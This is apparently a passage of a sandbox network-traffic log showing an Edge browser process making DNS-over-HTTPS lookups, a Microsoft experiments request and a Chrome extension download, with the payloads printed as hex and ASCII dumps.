2024-11-21 21:12:12 UTC	16384	IN	Data Raw: c0 44 8b d0 45 33 c9 42 8b 8c 8d 74 01 00 00 41 8b c0 49 0f af ca 48 03 c8 4c 8b c1 42 89 8c 8d 74 01 00 00 49 c1 e8 20 45 03 cf 45 3b cc 75 d7 45 85 c0 74 2a 83 bd 70 01 00 00 73 0f 83 39 fd ff ff 8b 85 70 01 00 00 44 89 84 85 74 01 00 00 44 8b a5 70 01 00 00 45 03 e7 e9 1f fd ff ff 44 8b a5 70 01 00 00 e9 1a fd ff ff f7 d9 4c 8d 05 8c b3 fd ff f7 e1 89 4c 24 48 8b c2 c1 e8 03 89 44 24 40 8b d0 89 44 24 34 85 c0 0f 84 95 03 00 00 b9 26 00 00 00 3b d1 8b c2 0f 47 c1 33 d2 89 44 24 50 ff c8 8b f8 41 0f b6 8c 80 32 50 03 00 41 0f b6 b4 80 33 50 03 00 48 8d 1c 8d 00 00 00 00 8d 04 0e 4c 8b c3 48 8d 8d 44 03 00 00 89 85 40 03 00 00 e8 f7 57 00 00 48 8d 0d 20 b3 fd ff 48 c1 e6 02 0f b7 84 b9 30 50 03 00 48 8d 91 20 47 03 00 48 8d 8d 44 03 00 00 4c 8b c6 48 03 Data Ascii: DE3BtAIHLBtI EE;uEt*ps9pDtDpEDpLL$HD$@D$4&;G3D$PA2PA3PHLHD@WH H0PH GHDLH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49978	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:05 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:05 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-21 21:13:06 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 21 Nov 2024 21:13:06 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e63ae85ed1c41fe-EWR alt-svc: h3=":443"; ma=86400
2024-11-21 21:13:06 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f6 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomPC)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49976	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:05 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:05 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-21 21:13:06 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 21 Nov 2024 21:13:06 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e63ae85ec9eefa9-EWR alt-svc: h3=":443"; ma=86400
2024-11-21 21:13:06 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49977	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:05 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:05 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-21 21:13:06 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 21 Nov 2024 21:13:06 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e63ae863c21430f-EWR alt-svc: h3=":443"; ma=86400
2024-11-21 21:13:06 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fd 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49980	94.245.104.56	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:06 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:07 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Thu, 21 Nov 2024 21:13:06 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=e5e4197507aadfd116f59447fade3d01fe97a8db2e83bfcd54af3bd128319bb7;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=e5e4197507aadfd116f59447fade3d01fe97a8db2e83bfcd54af3bd128319bb7;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49983	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:06 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:06 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49984	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:06 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:06 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49982	162.159.61.3	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:06 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-21 21:13:06 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50002	142.251.35.161	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:09 UTC	594	OUT	GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:10 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 138356 X-GUploader-UploadID: AFiumC5o3EfmoRX5Dz29nH_MZkIFgttqo2Rx3ejj7psa_ZmmzABSQ5xLGC8juD5CKGCT_JT3gE9JKpUQMg X-Goog-Hash: crc32c=ld9IFg== Server: UploadServer Date: Thu, 21 Nov 2024 16:45:00 GMT Expires: Fri, 21 Nov 2025 16:45:00 GMT Cache-Control: public, max-age=31536000 Age: 16089 Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-21 21:13:10 UTC	817	IN	Data Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"\|F\|Vw%t.y.?&a<nS+\|=ra'}(pW9sC&jJ-''B0u?.;4BN\
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2\|}nK+,\]Q\|Em:aox/cl &ud]p;MJW4M@
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 Data Ascii: `cc86D<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(\|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
2024-11-21 21:13:10 UTC	1390	IN	Data Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
